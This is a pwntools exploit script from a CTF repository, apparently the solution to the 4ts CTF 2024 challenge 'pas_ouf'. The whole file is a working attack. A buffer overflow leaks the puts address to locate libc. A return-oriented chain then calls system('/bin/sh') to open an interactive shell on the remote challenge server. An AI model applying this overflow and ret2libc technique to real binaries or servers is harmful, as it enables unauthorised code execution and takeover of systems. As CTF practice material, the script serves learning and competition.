ctfs/4ts_ctf_2024/pas_ouf/b.py

#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
# r = process()
r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)

# funcs
s = lambda a: r.sendline(a)

# buf
buf = b"A"*272
buf += p64(0x404118)
buf += p64(0x40129e)
buf += b"A"*280
buf += p64(target.sym.main)
s(buf)

# leak
r.recvuntil(b"@\n")
puts = u64(r.recv(6).ljust(8, b"\x00"))
log.info("puts: %#x", puts)
libc = puts - 0x80e50
log.info("libc: %#x", libc)
system = libc + 0x50d70
sh = libc + 0x1d8678

# gadgets
pop_rdi = libc + 0x2a3e5

# pop
buf = b"A"*280
buf += p64(pop_rdi)
buf += p64(sh)
buf += p64(pop_rdi+1)
buf += p64(pop_rdi+1)
buf += p64(system)
s(buf)

r.interactive()